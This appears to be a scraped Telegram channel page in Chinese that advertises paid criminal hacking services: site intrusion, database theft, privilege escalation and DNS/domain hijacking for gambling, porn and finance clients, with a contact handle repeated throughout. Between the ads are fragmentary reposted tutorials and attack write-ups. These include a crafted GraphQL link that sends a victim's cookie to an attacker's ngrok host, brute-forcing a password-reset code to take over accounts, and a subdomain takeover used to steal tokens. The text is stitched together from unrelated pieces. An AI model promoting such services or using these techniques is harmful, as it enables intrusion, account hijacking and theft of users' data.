黑客渗透 金融劫持 BC域名跳转
17.2K subscribers
1.81K photos
19 videos
2 files
163 links
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
破解网站app软件技术等等 黑客技术咨询
@hacker_HouZiM
Download Telegram
DNS流量转流量持持跳转运营商持域名跳转!
适合以下这几种行业!
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍1
利用AWVS扫描器对网站进行一个全面的扫描,收集信息
找到了存在sql注入漏洞的页面 http://10.10.10.128/se3reTdir777/
用sqlmap跑出数据库(aiweb1和information_schema)
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
在开始编写 Python 代码前,合格的程序员还是需要具备基础的网页知识。在这里打开教程中所使用的网页:https://realpython.github.io/fake-jobs/
除了右键查看外,使用 Windows 的同学也可以通过 Ctrl + Shift + I (MacOS: Cmd + Alt + I)的方式调动开发人员工具,在“元素”中查看源代码。使用开发人员工具可以折叠或展开代码,也可以根据鼠标悬浮展示代码在网页中所对应的内容。
1👍1
bit(比特)以及byte(字节),而又因为我们Python中的str是使用Unicode进行编码的,并且一个字符对应若干个字节,所以,如果是要在网络上传播,或是储存到磁盘上,就需要把str变为以字节为单位的bytes

Python中的bytes类型用带b前缀的单引号,或者双引号来表示:

X = b'AaBbCc'

这里我们需要注意一点:b'AaBbCc'与'AaBbCc'在Python中的输出结果虽然是一样的。但是,bytes中的每一个字符都只占用内存中的一个字节。

而以Unicode表示的str通过encode()函数的方法同样可以编码为指定的bytes

反过来,我们在网络或者自己的磁盘上读取到的内容是以bytes的方式存在,而我们要把它们转换为str,在Python中就需要用到decode()这个函数
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
我們當然使用 Python 的好朋友 List Comprehension (按此了解更多)去處理這個情況。如上圖所示,我們可以直接使用 ord(x) for x in my_str 的語法,揉合 List Comprehension 去獲取多個英文字母的 ASCII 索引。
1
字符串以GBK格式显示
字符串是unicode编码
既然Python2并不会自动的把文件编码转为unicode存在内存里, 那就只能使出最后一招了,你自己人肉转。Py3 自动把文件编码转为unicode必定是调用了什么方法,这个方法就是,decode(解码) 和encode(编码)
1
1.渗透测试前的简单信息收集
2.sqlmap的使用
3.nmap的使用
4.nc反弹提权
5.linux系统的权限提升
6.backtrack5中渗透测试工具nikto和w3a的的使用等假设黑客要入侵的你的网站域名为:hack-test.com让我们用ping命令获取网站服务器的IP地址
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
2👍1
一个开放重定向漏洞,一个路径遍历漏洞,再加一个CSRF漏洞,综合构造以下链接以获取受害者Cookie信息:

https://target.com/api/graphql/v2?query=query ZtSpXXXXXXXXX($id: ID!) { XXXXXXXX(id: $id) { title steps headService { id name __typename } tailService { id name __typename } services { id name __typename } __typename }}&variables={"id":"1234/../../../../../..///xxxxxxx.ngrok.io//"}
只要受害者点击上述链接,他的Cookie信息就会被发送到我的ngrok服务端来,我也即能利用他的cookie信息登录他的账户,实现账户劫持。
2
上面那个SSRF请求吗,我ngrok服务端收到的ssrf请求如下:
其中的cookie头就是用户会话信息,因此可以通过用XSS方式来利用这个cookie信息。但我找了好久也没发现可用的XSS漏洞。之后,我发现另一个与GetAuthorized请求相似的请求ZtsplXXXXXXX:
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
当前新注册的Townscript账户为例,在忘记密码功能区域输入了与该账户绑定的邮箱地址,然后点击“找回密码”,然后,我在该账户绑定的邮箱中收到了以下找回密码的链接:
上述找回密码链接非常简单,其中包括了绑定账户的邮箱地址和一个code,该code是一个6位数的数字。那就用我之前账户的邮箱地址来试试吧,随便输入一个code值,用Burp来暴力枚举试试:
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1
把6位数的构造字典拉进去就是一番枚举,但大部份响应看似都是一些404页面未找到的302响应,在我快要放弃的时候,我又检查了一下响应长度,一看,其中存在长度为391的响应:尝试着把该响应进行转发,哇,竟然可以成功跳转到以下密码重置界面!
渗透爬虫软件 资源采集 劫持域名 提取抓料子
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
在密码重置功能缺乏速率限制(Rate Limit)的情况下,我通过暴力枚举重置了我之前忘记了Townscript登录密码和绑定邮箱密码的Townscript账户,成功找回了丢失的Townscript账户权限,以及其中注册的数百个参与人员信息。

但是,Townscript应用在账户设置中严禁更改用户的绑定邮箱,所以,即使根据上述密码重置漏洞劫持了受害者账户,但受害者一样还可以通过自己的绑定邮箱再次发起密码重置请求,找回账户,那对攻击者来说,这就不算真正意义上的账户劫持。
接下来,我对Townscript应用中的用户设置(edit)操作请求进行了抓包,从中发现了包含的用户绑定邮箱地址,然后我尝试对其进行了替换:
渗透爬虫软件 资源采集 劫持域名 提取抓料子
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
从上述Refused状态的lookup解析中可以看出,project-cascade.visualstudio.com本来是注册指向Azure DNS的,但是,现在它在Azure DNS的注册指向是空的了,也就是说,我们可以用手头现有的Azure账户来注册获得(takeover)这个子域名,然后往其中创建任意的DNS记录。注册后的project-cascade.visualstudio.com状态如下:
在该构造链接中,我们把原先的reply_to参数值更改为了我们控制的子域https%3A%2F%2Farec.project-cascade.visualstudio.com%2。访问该链接后,一样会跳转到正常的microsoft live.com登录界面,当然如果当前用户是登录后状态,也一样会在其中执行跳转请求:
渗透爬虫软件 资源采集 劫持域名 提取抓料子
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
2👍1
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 258 ...omitted for brevity... {"descriptor":"msa.NTg0Zjc4NDAtYzc5ZC03MWU0LWJkN2ItMDZhY2Y1N2Q2OTA1","displayName":"s","mail":"<account_email>","unconfirmedMail":null,"country":"AU","dateCreated":"2018-05-25T23:19:53.6843383+00:00","lastModified":"2019-01-06T15:43:50.2963651+00:00","revision":0}
同时,利用该窃取token,还能通过链接https://app.vsaex.visualstudio.com/me?mkt=en-US访问用户关联在dev.azure.com上的一些开发项目:

且最终能访问获取到用户托管在dev.azure.com上的项目资源。请求:
2
在做爬虫分析时,我们经常要模拟一下其中的请求,这个时候如果去写一段代码,未免太小题大做了,直接通过Chrome拷贝一个cURL,在命令行中跑一下看看结果即可
渗透爬虫软件 资源采集 劫持域名 提取抓料子
六合·色站·彩票·博彩·金融
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1